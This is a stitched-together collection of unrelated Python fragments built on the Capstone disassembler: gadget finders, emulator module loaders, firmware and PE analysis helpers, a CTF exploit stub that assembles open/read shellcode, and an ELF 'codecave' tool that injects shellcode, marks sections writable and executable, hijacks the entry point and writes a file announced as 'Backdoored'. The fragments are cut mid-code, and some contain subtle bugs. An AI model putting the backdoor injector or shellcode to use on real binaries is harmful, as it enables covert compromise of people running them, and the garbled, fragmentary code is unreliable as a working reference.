def find_gadget(fname, gadget_arg): if os.path.isfile(fname + ".gadgets.json"): with open(fname + ".gadgets.json", "r") as f: cache = json.loads(f.read()) if gadget_arg in cache: #print "Cache gadget", hex(cache[gadget_arg]), gadget_arg print "Cache gadget 0x", "*" * 16, " ", "*" * 16 return cache[gadget_arg] else: with open(fname + ".gadgets.json", "w") as f: f.write("{}") #Load ELF fd = open(fname, "rb") elf = elffile.ELFFile(fd) for i in xrange(elf.num_sections()): section = elf.get_section(i) if section.name == ".text": data = section.data() addr = section.header["sh_addr"] break #cleanup gadget gadget = gadget_arg.split(";") gadget = filter(lambda x: x.strip() != "", gadget) gadget = map(lambda x: x.strip(), gadget) #iterate over .text section i = 0 md = cs.Cs(cs.CS_ARCH_ARM64, cs.CS_MODE_ARM) while i < len(data): asm = list(md.disasm(data[i:], addr + i)) if len(asm) < len(gadget): i += 4 continue #iterate over disassembled code for j in xrange(len(asm)): #search for gadget found = True for k in xrange(len(gadget)): instr = gadget[k] mnemonic = instr.split(" ")[0] op_str = " ".join(instr.split(" ")[1:]) if mnemonic.strip() != asm[j + k].mnemonic.strip(): found = False break elif mnemonic.strip() == "cbz" and op_str.strip().split( ",")[0] == asm[j + k].op_str.strip().split(",")[0]: pass elif op_str.strip() != asm[j + k].op_str.strip(): found = False break else: pass if found: print "Found gadget", hex(i + (j * 4) + addr), ";".join(gadget) #save to cache with open(fname + ".gadgets.json", "r") as f: cache = json.loads(f.read()) cache[gadget_arg] = i + (j * 4) + addr with open(fname + ".gadgets.json", "w") as f: f.write(json.dumps(cache)) return i + (j * 4) + addr i += len(asm) * 4 print "FAILED", gadget_arg
def find_idausr_offset(ida_path): ida = lief.parse(ida_path) cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64) csDetails = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64) csDetails.detail = True imagebase = ida.optional_header.imagebase for sect in ida.sections: if sect.name == '.text': text = sect code = str(bytearray(text.content)) value = sect.search('IDAUSR') if value != 0xffffffffffffffff: string = sect.virtual_address + imagebase + value def search(code, addr, offset, size, target): end = offset + size if visited[offset]: return while offset <= end: if visited[offset]: break loop = False for insn in (cs.disasm(code[offset:offset + 15], addr + offset)): if visited[offset]: break visited[offset] = True if insn.bytes[0] == 0x48 and insn.mnemonic == 'lea': details = next( csDetails.disasm(str(bytearray(insn.bytes)), insn.address)) ops = details.operands if ops[1].mem.base == capstone.x86_const.X86_REG_RIP: if target(details): print 'Found:', print hex(details.address), print details.mnemonic, details.op_str return details offset = insn.address + insn.size - addr loop = True if not loop: visited[offset] = True offset += 1 def like_yara(delim, target, start=0, end=None): global visited visited = [None] * len(code) cur = code.find(delim, start) if end is None: end = len(code) while cur != -1 and cur < end: for i in range(30): res = search(code, text.virtual_address + imagebase, cur - i, i, target) if res: return res, cur - i cur = code.find(delim, cur + 1) func = like_yara( '\x84\xc0', lambda insn: insn.address + insn.size + insn.operands[1]. mem.disp == string)[1] ret = like_yara( '\xc3', lambda insn: insn.operands[0].reg == capstone.x86_const.X86_REG_RAX, func, func + 0x10000)[0] # lea rax, [rip + offset] offset = ret.address + ret.size + ret.operands[1].mem.disp offset -= imagebase print 'offset:', hex(offset) return offset
try: import capstone except ImportError: sys.exit(-1) # Capstone is not installed file_path = sys.argv[1] offset = int(sys.argv[2]) arch = int(sys.argv[3]) mode = int(sys.argv[4]) try: # Receive data from temporary file with open(file_path, "rb") as f: data = f.read() md = capstone.Cs(arch, mode) end = 0 address = [] mnemonic = [] op_str = [] code_hex = [] for i in md.disasm(data, offset): s = binascii.b2a_hex(i.bytes).decode().upper() code_hex.append(" ".join([s[j:j + 2] for j in range(0, len(s), 2)])) address.append(i.address) mnemonic.append(i.mnemonic) op_str.append(i.op_str) end = i.address + i.size max_len_address = 0 max_len_mnemonic_op = 0
# A gdb web UI running /bin/sleep. Can you pwn it? # """ # https://twitter.com/_tsuro/status/1341445230436999172 # https://github.com/sroettger/play-my-challenge # # pip3 install capstone keystone-engine unicorn python-socketio websocket-client import socketio import time import os import sys import keystone import capstone from unicorn import * from unicorn.x86_const import * cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64) ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64) def open_read_payload(): return ( # 'a' = 0x61 'add al, 1', 'add al, 1', 'sub rsp, 8', 'push rsp', 'add al, 0xf', 'add al, 0x2f', 'add al, 8', 'add al, 0x18', 'pop rdi',
#!/usr/bin/env python3 from sys import argv from os import path import capstone from elftools.elf.elffile import ELFFile from elftools.elf.sections import SymbolTableSection from panda import Panda, blocking, ffi from panda.helper.x86 import R_EAX, R_EBX, R_ECX, registers # Single arg of arch, defaults to i386 arch = "i386" if len(argv) <= 1 else argv[1] panda = Panda(generic=arch) md = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32) bin_dir = "taint" bin_name = "taint_asm" assert (path.isfile(path.join(bin_dir, bin_name))), "Missing file {}".format( path.join(bin_dir, bin_name)) # Take a recording of toy running in the guest if necessary recording_name = bin_dir + "_" + bin_name if not path.isfile(recording_name + "-rr-snp"): @blocking def run_it(): panda.record_cmd(path.join(bin_dir, bin_name), copy_directory=bin_dir, recording_name=recording_name) panda.stop_run()
def load_module(self, path=None, data=None): """ Load a module into the emulator space from the specified path """ pe = self.load_pe(path=path, data=data, imp_id=w32common.IMPORT_HOOK_ADDR) if pe.arch == _arch.ARCH_X86: disasm_mode = cs.CS_MODE_32 elif pe.arch == _arch.ARCH_AMD64: disasm_mode = cs.CS_MODE_64 else: raise Win32EmuError('Unsupported architecture: %s', pe.arch) if not self.arch: self.arch = pe.arch self.set_ptr_size(self.arch) self.emu_eng.init_engine(_arch.ARCH_X86, pe.arch) if not self.disasm_eng: self.disasm_eng = cs.Cs(cs.CS_ARCH_X86, disasm_mode) if not data: file_name = os.path.basename(path) + '.exe' mod_name = os.path.splitext(file_name)[0] else: mod_hash = hashlib.sha256() mod_hash.update(data) mod_hash = mod_hash.hexdigest() mod_name = mod_hash file_name = '%s.exe' % (mod_name) self.api = WindowsApi(self) cd = self.get_cd() if not cd.endswith('\\'): cd += '\\' emu_path = cd + file_name if not data: with open(path, 'rb') as f: data = f.read() self.fileman.add_existing_file(emu_path, data) # Strings the initial buffer so that we can detect decoded strings later on if self.profiler and self.do_strings: self.profiler.strings['ansi'] = self.get_ansi_strings(data) self.profiler.strings['unicode'] = self.get_unicode_strings(data) # Set the emulated path emu_path = '' self.cd = self.get_cd() if self.cd: if not self.cd.endswith('\\'): self.cd += '\\' emu_path = self.cd + os.path.basename(file_name) pe.set_emu_path(emu_path) self.map_pe(pe, mod_name=mod_name, emu_path=emu_path) self.mem_write(pe.base, pe.mapped_image) self.setup() if not self.stack_base: self.stack_base, stack_addr = self.alloc_stack(0x12000) self.set_func_args(self.stack_base, self.return_hook) # Init imported data for addr, imp in pe.imports.items(): mn, fn = imp mod, eh = self.api.get_data_export_handler(mn, fn) if eh: data_ptr = self.handle_import_data(mn, fn) sym = "%s.%s" % (mn, fn) self.global_data.update({addr: [sym, data_ptr]}) self.mem_write( addr, data_ptr.to_bytes(self.get_ptr_size(), 'little')) return pe
args = parser.parse_args() if (args.debug): l = logging.DEBUG else: l = logging.INFO logging.basicConfig(stream=sys.stdout, level=l, format='%(filename)s : %(asctime)s : %(message)s', datefmt='%d/%m/%y @ %H:%M:%S') # create emulator and disassembler emu = unicorn.Uc(unicorn.UC_ARCH_ARM, unicorn.UC_MODE_THUMB) asm = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_THUMB) if (args.target == 'lpc1114fn28'): emu.mem_map(0x00000000, 32 * 1024) # Figure 6: 32 kB => flash emu.mem_map(0x10000000, 4 * 1024) # Figure 6: 4 kB => SRAM emu.mem_map(0x1FFF0000, 16 * 1024) # Figure 6: 16 kB => boot ROM emu.mem_map(0x40000000, 512 * 1024) # Figure 6: 512 kB => APB peripheral bus emu.mem_map(0x50000000, 2 * 1024 * 1024) # Figure 6: 2 MB => AHB peripheral bus emu.mem_map(0xE0000000, 1 * 1024 * 1024) # Figure 6: 1 MB => private peripheral bus elif (args.target == 'lpc1313fbd48'): emu.mem_map(0x00000000, 32 * 1024) # Figure 14: 32 kB => flash emu.mem_map(0x10000000, 8 * 1024) # Figure 14: 8 kB => SRAM
def arm_process(filename): """ Disassemble the binary processing PC relative loads ldr.w ip, [pc, #16] library function invokations blx #0x10a40 <strcmp@plt> inline jump tables tbh [pc, r3, lsl #1] .short 0x0123 ... or add r2, pc, #4 ldr pc, [r2, r3, lsl #2] .word 0x00010545 ... :param filename: path to target executable """ # Open ELF executable, read info and read raw binary .text section with open(filename, 'rb') as f: raw = f.read() f.seek(0) textsec = ELFFile(f).get_section_by_name('.text') textsec.addr = textsec.header['sh_addr'] textsec.size = textsec.header['sh_size'] textsec.offset = textsec.header['sh_offset'] textraw = raw[textsec.offset:textsec.offset + textsec.size] with open('plts.info') as f: plts = { int(l.split()[0], 16): ' ' + l.split()[1].rstrip(':') for l in f } dis = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_THUMB) dis.syntax = capstone.CS_OPT_SYNTAX_ATT inlinedata = {} negpcrel = False secondpass = True last_cmp = ('', '') last_adr_dest = 0 last_adr_reg = None pcrelre = re.compile('\[pc,\s*\#(\-?0x[0-9a-f]+)\]', re.I) pcreltblre = re.compile( '\[pc,\s*(r[0-9]+)(,\s*lsl \#1)?\]|pc,\s*\[r[0-9]+,\s*(r[0-9]+|fp|lr|sb|sl),\s*lsl\s*\#2\]', re.I) pcreladdre = re.compile('^(r[0-9]+|fp|lr|sb|sl),\s*pc,\s*\#(0x[0-9a-f]+)$', re.I) baseregre = re.compile('\[([^,]+),?.*\]', re.I) calls = set(('bl', 'blx')) offtableop = set(('tbb', 'tbh')) f = open('instrs.info', 'w') curr_off = 0 # Linearly disassemble while curr_off < textsec.size: for e in dis.disasm_lite(textraw[curr_off:], textsec.addr + curr_off): curr_off += e[1] if e[2].split('.')[0] == 'cmp': last_cmp = tuple(e[3].split(',')) instr = ('%x' % e[0]).rjust(8) + ':\t' + e[2].ljust( 7) + ' ' + e[3].replace(', ', ',').replace(' ', '|') m = pcrelre.search(instr) if m: # Insert label for PC relative loads dest = (e[0] & 0xFFFFFFFC) + int(m.group(1), 16) + 4 if dest < curr_off + textsec.addr: negpcrel = True inlinedata[dest] = load_size(e[2], e[3]) instr = pcrelre.sub('0x%X' % dest, instr) elif e[2] in calls and e[3].startswith('#'): # Insert plt symbol instr += plts.get(int(e[3][1:], 16), '') elif e[2].startswith('adr'): # Insert label for PC relative add const = e[3].split(', ')[1] last_adr_dest = (e[0] & 0xFFFFFFFC) + int(const[1:], 16) + 4 last_adr_reg = e[3].split(',')[0] instr = instr.replace(const, '0x%x' % last_adr_dest) elif e[2].startswith('addw'): # PC relative double loads load address with addw m = pcreladdre.search(e[3]) if m: dest = (e[0] & 0xFFFFFFFC) + int(m.group(2), 16) + 4 inlinedata[dest] = 8 instr = ('%x' % e[0]).rjust(8) + ':\tadr ' + m.group( 1) + (',0x%X' % dest) f.write(instr + '\n') if e[2] in offtableop or e[2].startswith('ldr'): m = pcreltblre.search(e[3]) if m: # Process inline jumptable offsize, tablesize = eval_tb_size( e[2], last_cmp, m.group(1) if m.group(1) is not None else m.group(3)) if offsize > 2: # ldr jumptable last_adr_reg = None for i in xrange(0, tablesize, 4): inlinedata[last_adr_dest + i] = 4 else: # tb jumptable tb_process(offsize, curr_off + textsec.addr, textraw[curr_off:curr_off + tablesize], f) curr_off += tablesize break else: # adr + ldr m = baseregre.search(e[3]) if m and last_adr_reg == m.group(1): inlinedata[last_adr_dest] = load_size(e[2], e[3]) last_adr_reg = None if curr_off + textsec.addr in inlinedata: break else: if curr_off < textsec.size: inlinedata[curr_off + textsec.addr] = 2 while curr_off + textsec.addr in inlinedata: # Parse inline data pc = curr_off + textsec.addr size = inlinedata.pop(pc) if size == 1: vals = unpack('<BB', textraw[curr_off:curr_off + 2]) f.write(('%x' % pc).rjust(8) + ':\t.byte 0x%x\n' % vals[0]) f.write(('%x' % (pc + 1)).rjust(8) + ':\t.byte 0x%x\n' % vals[1]) size = 2 else: if size == 8: inlinedata[pc + 4] = 4 size = 4 val = unpack('<H' if size == 2 else '<I', textraw[curr_off:curr_off + size])[0] f.write(('%x' % pc).rjust(8) + ':\t' + ('.short' if size == 2 else '.word').ljust(7) + ' 0x%x\n' % val) curr_off += size if secondpass and curr_off >= textsec.size and negpcrel: # If some PC relative load with negative offsets are found, a second pass is necessary secondpass = False curr_off = 0 last_cmp = ('', '') last_adr_dest = 0 last_adr_reg = None f.close() f = open('instrs.info', 'w') f.close()
def load_module(self, path=None, data=None, first_time_setup=True): """ Load a module into the emulator space from the specified path """ pe = self.load_pe(path=path, data=data, imp_id=w32common.IMPORT_HOOK_ADDR) if pe.arch == _arch.ARCH_X86: disasm_mode = cs.CS_MODE_32 elif pe.arch == _arch.ARCH_AMD64: disasm_mode = cs.CS_MODE_64 else: raise Win32EmuError('Unsupported architecture: %s', pe.arch) if not self.arch: self.arch = pe.arch self.set_ptr_size(self.arch) # No need to initialize the engine and Capstone again if first_time_setup: self.emu_eng.init_engine(_arch.ARCH_X86, pe.arch) if not self.disasm_eng: self.disasm_eng = cs.Cs(cs.CS_ARCH_X86, disasm_mode) if not data: file_name = os.path.basename(path) mod_name = os.path.splitext(file_name)[0] else: mod_hash = hashlib.sha256() mod_hash.update(data) mod_hash = mod_hash.hexdigest() mod_name = mod_hash file_name = '%s.exe' % (mod_name) self.api = WindowsApi(self) cd = self.get_cd() if not cd.endswith('\\'): cd += '\\' emu_path = cd + file_name if not data: with open(path, 'rb') as f: data = f.read() self.fileman.add_existing_file(emu_path, data) # Strings the initial buffer so that we can detect decoded strings later on if self.profiler and self.do_strings: self.profiler.strings['ansi'] = [ a[1] for a in self.get_ansi_strings(data) ] self.profiler.strings['unicode'] = [ u[1] for u in self.get_unicode_strings(data) ] # Set the emulated path emu_path = '' self.cd = self.get_cd() if self.cd: if not self.cd.endswith('\\'): self.cd += '\\' emu_path = self.cd + os.path.basename(file_name) pe.set_emu_path(emu_path) # There's a bit of a problem here, if we cannot reserve memory # at the PE's desired base address, and the relocation table # is not present, we can't rebase it. So this is gonna have to # be a bit of a hack for binaries without a relocation table. # This logic is really only for child processes, since we're pretty # much guarenteed memory at the base address of the main module. # 1. If the memory at the child's desired load address is already # being used, remap it somewhere else. I'm pretty sure that # the already-used memory will always be for a module, # since desired load addresses don't really vary across PEs # 2. Fix up any modules that speakeasy has open for the parent # to reflect where it was remapped # 3. Try and grab memory at the child's desired base address, # if that isn't still isn't possible, we're out of luck # # But if the relocation table is present, we can rebase it, # so we do that instead of the above hack. imgbase = pe.OPTIONAL_HEADER.ImageBase ranges = self.get_valid_ranges(pe.image_size, addr=imgbase) base, size = ranges if base != imgbase: if pe.has_reloc_table(): pe.rebase(base) else: parent_map = self.get_address_map(imgbase) # Already being used by the parent, so let's remap the parent # Do get_valid_ranges on the parent map size so we get a # suitable region for it new_parent_mem, unused = self.get_valid_ranges(parent_map.size) new_parent_mem = self.mem_remap(imgbase, new_parent_mem) # Failed if new_parent_mem == -1: # XXX what to do here pass # Update parent module pointer for pe_, ranges_, emu_path_ in self.modules: base_, size_ = ranges_ if base_ == imgbase: self.modules.remove((pe_, ranges_, emu_path_)) self.modules.append( (pe_, (new_parent_mem, size_), emu_path_)) break # Alright, let's try to grab that memory for the child again ranges = self.get_valid_ranges(pe.image_size, addr=imgbase) base, size = ranges if base != imgbase: # Out of luck # XXX what to do here pass self.mem_map(pe.image_size, base=base, tag='emu.module.%s' % (mod_name)) self.modules.append((pe, ranges, emu_path)) self.mem_write(pe.base, pe.mapped_image) self.setup(first_time_setup=first_time_setup) if not self.stack_base: self.stack_base, stack_addr = self.alloc_stack(0x12000) self.set_func_args(self.stack_base, self.return_hook) # Init imported data for addr, imp in pe.imports.items(): mn, fn = imp mod, eh = self.api.get_data_export_handler(mn, fn) if eh: data_ptr = self.handle_import_data(mn, fn) sym = "%s.%s" % (mn, fn) self.global_data.update({addr: [sym, data_ptr]}) self.mem_write( addr, data_ptr.to_bytes(self.get_ptr_size(), 'little')) return pe
# def dump_symbols(emulator, fd): for m in emulator.modules: for addr in m.symbol_lookup: v = m.symbol_lookup[addr] fd.write("0x%08X(0x%08X):%s\n" % (addr, addr - m.base, v[0])) # # # g_md_thumb = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_THUMB) g_md_thumb.detail = True g_md_arm = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM) g_md_arm.detail = True g_md_arm64 = capstone.Cs(capstone.CS_ARCH_ARM64, capstone.CS_MODE_ARM) g_md_arm64.detail = True def get_module_by_addr(emu, addr): ms = emu.modules module = None for m in ms: if (addr >= m.base and addr <= m.base + m.size): module = m
def __getCs(self, arch): if not self.__cs or self.__cs.arch != arch.arch or self.__cs.mode != arch.mode: self.__cs = capstone.Cs(arch.arch, arch.mode) return self.__cs
def do_disassembly(address_ptr, dsm_queue, address_map, full_hexdump, res_file, functionname=None): indirect_controlflows = 0 # +1 if problematic controlflow // not yet handled conditional_branch = [ 'jo', 'jno', 'jb', 'jnae', 'jc', 'jnb', 'jae', 'jnc', 'jz', 'je', 'jnz', 'jne', 'jbe', 'jna', 'jnbe', 'ja', 'js', 'jns', 'jp', 'jpe', 'jnp', 'jpo', 'jl', 'jnge', 'jnl', 'jge', 'jle', 'jng', 'jnle', 'jg' ] function_call = ['call', 'callf'] unconditional_branch = ['jmp', 'jmpf'] return_instr = ['ret'] mode = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32) # set architecture to x86 (32 bit) inbasicblock = True startofbasicblock = True startaddr = 0 functionentries = 0 basicblock = [] if hex(address_ptr) not in address_map: address_map.append(hex(address_ptr)) # mark address as visited if functionname is None: functionname = address_ptr while inbasicblock: if startofbasicblock: startofbasicblock = False startaddr = address_ptr buff = binascii.a2b_hex(full_hexdump[get_string_pointer( address_ptr):get_string_pointer(address_ptr + 7)]) if len(list(mode.disasm( buff, address_ptr))) == 0: # check if end of instructions inbasicblock = False else: address_ptr_first_instruction = address_ptr for instruction in mode.disasm(buff, address_ptr): if instruction.address == address_ptr_first_instruction: # process only the first instruction found disassembled = hex( instruction.address ) + ' ' + instruction.mnemonic + ' ' + instruction.op_str basicblock.append(disassembled) if len(basicblock) > 1: if basicblock[len(basicblock) - 2].find("push ebp") > 0 \ and basicblock[len(basicblock) - 1].find("mov ebp, esp") > 0: functionentries += 1 if instruction.mnemonic in unconditional_branch: inbasicblock = False if instruction.op_str.find( 'dword ptr') != -1: # indirect (ptr) indirect_controlflows += 1 elif instruction.op_str.find( '0x') == -1: # indirect (registers) indirect_controlflows += 1 else: dsm_queue.put([ int(instruction.op_str, 16), functionname ]) elif instruction.mnemonic in function_call: address_ptr += instruction.size if instruction.op_str.find('dword ptr') != -1: indirect_controlflows += 1 elif instruction.op_str.find('0x') == -1: indirect_controlflows += 1 else: dsm_queue.put([int(instruction.op_str, 16)]) elif instruction.mnemonic in conditional_branch: inbasicblock = False dsm_queue.put( [address_ptr + instruction.size, functionname]) dsm_queue.put( [int(instruction.op_str, 16), functionname]) elif instruction.mnemonic in return_instr: inbasicblock = False elif functionentries > 1: # another function entry - "backtracing" does not check for lea's inbasicblock = False del basicblock[len(basicblock) - 2:len(basicblock)] else: address_ptr += instruction.size put_data_in_json_file(basicblock, hex(startaddr), hex(functionname), res_file) # slow. do as return value!
After our CPU has been created, allocate memory and set starting state ''' # map 2MB memory for this emulation panda.map_memory("mymem", 2 * 1024 * 1024, ADDRESS) # Write code into memory panda.physical_memory_write(ADDRESS, bytes(encoding)) # Set starting_pc panda.arch.set_pc(cpu, ADDRESS) # Always run insn_exec panda.cb_insn_translate(lambda x, y: True) md = capstone.Cs(capstone.CS_ARCH_ARM64, capstone.CS_MODE_ARM) # misp32 @panda.cb_insn_exec def on_insn(cpu, pc): ''' At each instruction, print capstone disassembly. ''' if pc >= stop_addr: print("Finished execution") panda.arch.dump_state(cpu) os._exit(0) # TODO: we need a better way to stop here code = panda.virtual_memory_read(cpu, pc, 12) for i in md.disasm(code, pc): print("0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str))
def main(): args = get_args() log = Log(True) with open(args.binary, "rb") as f: binData = f.read() elf = ELF(binData) with open(args.shellcode, "rb") as f: shellcode = f.read() loc = int(args.location, 16) entry = int(args.entry, 16) if args.entry else None if elf.ei_mag != b"\x7f\x45\x4c\x46": log.error("Binary is not an ELF file. Exiting...") return 1 safe_cc = True for i in (elf.elf_file[loc], elf.elf_file[loc]+len(shellcode), 1): off = loc+i if elf.elf_file[off] != 0x00: safe_cc = False if not safe_cc: log.warn("Warning: selected codecave doesn't only contain null bytes") secid = elf.get_section_id_from_offset(loc) phid = elf.get_prog_hdr_id_from_offset(loc) if entry: legit_loc = entry else: if elf.ei_class == ELFHeaderEnum.Class.ELF64.value: legit_loc = elf.e_entry else: legit_loc = elf.e_entry - elf.program_headers[phid].p_vaddr sc = gen_sc_wrapper(elf.p("I", legit_loc), elf.p("I", loc+5), shellcode, args.breakpoint, elf.ei_class) end_secid = elf.get_section_id_from_offset(loc+len(sc)) end_phid = elf.get_prog_hdr_id_from_offset(loc+len(sc)) if not phid: log.error("Error, location is outside of a program header.") return elif not end_phid: log.warn(f"Program header {log.construct(log.colors.fg.GREEN, ProgramHeaderEnum.Type(elf.program_headers[phid].p_type).name, log.colors.format.RESET)} is finishing before the end of the shellcode.") resp = input("Increase its size? [Y/n] ") if resp.lower() != 'n': prev_size = elf.program_headers[phid].p_filesz elf.program_headers[phid].p_filesz = elf.program_headers[phid].p_filesz + len(sc) elf.program_headers[phid].p_memsz = elf.program_headers[phid].p_memsz + len(sc) log.info(f"Previous size: {log.construct(log.colors.fg.CYAN, prettyHex(prev_size), log.colors.format.RESET)} Bytes | New size: {log.construct(log.colors.fg.CYAN, prettyHex(elf.program_headers[phid].p_filesz), log.colors.format.RESET)} Bytes") elif elf.program_headers[phid].p_type != elf.program_headers[end_phid].p_type: log.error("Error! The shellcode is overlapping 2 program headers. Find another place.") elf.program_headers[phid].print_program_header() elf.program_headers[end_phid].print_program_header() return if not secid: print("[x] Error, location is outside of a section.") return elif not end_secid: log.warn(f"Section {log.construct(log.colors.fg.GREEN, elf.section_headers[secid].sh_name_str, log.colors.format.RESET)} is finishing before the end of the shellcode.") resp = input("Increase its size? [Y/n] ") if resp.lower() != 'n': prev_size = elf.section_headers[secid].sh_size elf.section_headers[secid].sh_size = elf.section_headers[secid].sh_size + len(sc) log.info(f"Previous size: {log.construct(log.colors.fg.CYAN, prettyHex(prev_size), log.colors.format.RESET)} Bytes | New size: {log.construct(log.colors.fg.CYAN, prettyHex(elf.section_headers[secid].sh_size), log.colors.format.RESET)} Bytes") elif elf.section_headers[secid].sh_name != elf.section_headers[end_secid].sh_name: log.error("Error! The shellcode is overlapping 2 sections. Find another place.") elf.section_headers[secid].print_section_header() elf.section_headers[end_secid].print_section_header() return log.info("Setting required program header flags...") elf.program_headers[phid].setFlags(ProgramHeaderEnum.Flags.PF_X.value | ProgramHeaderEnum.Flags.PF_W.value | ProgramHeaderEnum.Flags.PF_R.value) log.success(f"Program header flags: {log.construct(log.colors.fg.MAGENTA, elf.program_headers[phid].prettyFlags(), log.colors.format.RESET)}") log.info("Setting required section flags...") elf.section_headers[secid].setFlags(SectionHeaderEnum.Flags.SHF_EXECINSTR.value | SectionHeaderEnum.Flags.SHF_WRITE.value | SectionHeaderEnum.Flags.SHF_ALLOC.value) log.success(f"Section flags: {log.construct(log.colors.fg.MAGENTA, elf.section_headers[secid].prettyFlags(), log.colors.format.RESET)}") if entry: new_instr = b"\xe8" + elf.p("i", loc-entry) import capstone md = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64) i=0 legit_instrs = b"" for (addr, size, mnem, op_str) in md.disasm_lite(bytes(elf.elf_file[entry:entry+0x10]), entry): legit_instrs += elf.elf_file[entry+i:entry+size+i] i += size if i >= len(new_instr): break new_instr = new_instr + (b"\x90"*(len(legit_instrs)-len(new_instr))) elf.elf_file[entry:entry+len(new_instr)] = new_instr sc = gen_sc_wrapper(elf.p("I", legit_loc), elf.p("I", loc+5), shellcode, args.breakpoint, elf.ei_class, legit_instrs) else: elf.e_entry = loc \ if elf.ei_class == ELFHeaderEnum.Class.ELF64.value \ else loc + elf.program_headers[phid].p_vaddr elf.elf_file[loc:loc+len(sc)] = sc newBinData = elf.build_elf() newFileName = f"./{args.binary.split('/')[-1]}.bdoor" with open(newFileName, "wb") as f: f.write(newBinData) chmod(newFileName, 0o755) log.success(f"Backdoored file written at {log.construct(log.colors.fg.YELLOW, newFileName, log.colors.format.RESET)}!") return 0
import unicorn import random import string import capstone import re import globalData import binascii def ranstr(num): salt = ''.join(random.sample(string.ascii_letters + string.digits, num)) return salt cs = capstone.Cs(capstone.CS_ARCH_ARM64, capstone.CS_MODE_ARM) cs.detail = True all_regs = None reg_names = { "X0": unicorn.arm64_const.UC_ARM64_REG_X0, "X1": unicorn.arm64_const.UC_ARM64_REG_X1, "X2": unicorn.arm64_const.UC_ARM64_REG_X2, "X3": unicorn.arm64_const.UC_ARM64_REG_X3, "X4": unicorn.arm64_const.UC_ARM64_REG_X4, "X5": unicorn.arm64_const.UC_ARM64_REG_X5, "X6": unicorn.arm64_const.UC_ARM64_REG_X6, "X7": unicorn.arm64_const.UC_ARM64_REG_X7, "X8": unicorn.arm64_const.UC_ARM64_REG_X8, "X9": unicorn.arm64_const.UC_ARM64_REG_X9, "X10": unicorn.arm64_const.UC_ARM64_REG_X10, "X11": unicorn.arm64_const.UC_ARM64_REG_X11, "X12": unicorn.arm64_const.UC_ARM64_REG_X12,
def set_section_info(self): if self.info['PE']['FILE_HEADER']['Machine'] == 0x14c: dis = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32) elif self.info['PE']['FILE_HEADER']['Machine'] == 0x8664: dis = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64) else: dis = None if hasattr(self.pe, 'sections'): self.info['PE']['sections'] = [] for section in self.pe.sections: try: section_name = str(section.Name, 'utf-8').encode( 'ascii', errors='ignore').strip().decode( 'ascii').strip(' \t\r\n\0') except: section_name = str(section.Name, 'ISO-8859-1').encode( 'ascii', errors='ignore').strip().decode( 'ascii').strip(' \t\r\n\0') if section_name == '': section_name = '.noname' section_data = section.get_data() section_info = dict() section_info['Name'] = section_name section_info['Characteristics'] = section.Characteristics section_info['VirtualAddress'] = section.VirtualAddress section_info['VirtualSize'] = section.Misc_VirtualSize section_info['SizeOfRawData'] = section.SizeOfRawData section_info['hash'] = { 'md5': section.get_hash_md5(), 'sha1': section.get_hash_sha1(), 'sha256': section.get_hash_sha256() } section_info['entropy'] = section.get_entropy() section_info['executable'] = self.__is_executable( section.Characteristics) section_info['writable'] = self.__is_writable( section.Characteristics) section_info['file_ratio'] = self.__get_file_ratio( section_data) if section_info['executable']: tmp2 = [] if not dis: for code_line in dis.disasm(section_data, 0x1000): tmp2.append([ code_line.address, ' '.join([ format(each_byte, '02x') for each_byte in code_line.bytes ]), '{}'.format(code_line.mnemonic).strip(), '{}'.format(code_line.op_str).strip() ]) if len(tmp2) != 0: section_info['asm'] = tmp2 else: section_info['data'] = ' '.join([ format(each_byte, '02x') for each_byte in section_data ]) else: section_info['data'] = ' '.join([ format(each_byte, '02x') for each_byte in section_data ]) self.info['PE']['sections'].append(section_info)
# ScratchABit - interactive disassembler # # Copyright (c) 2018 Paul Sokolovsky # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import capstone import _any_capstone arch_id = "arm_32" dis_arm = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM) dis_thumb = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_THUMB) def PROCESSOR_ENTRY(): return _any_capstone.Processor("arm_32", dis_arm, dis_thumb)
from qiling.os.windows.structs import * from contextlib import contextmanager from karton.core import Karton, Task, Resource log = logging.getLogger(__name__) __author__ = "c3rb3ru5" __version__ = "1.0.0" memory = [] memory_dumps = [] kernel32 = 'kernel32_dll' ntdll = 'ntdll_dll' user32 = 'user32_dll' md32 = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64) md64 = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64) def raise_timeout(signum, frame): raise TimeoutError @contextmanager def timeout(time): signal.signal(signal.SIGALRM, raise_timeout) signal.alarm(time) try: yield except TimeoutError: pass
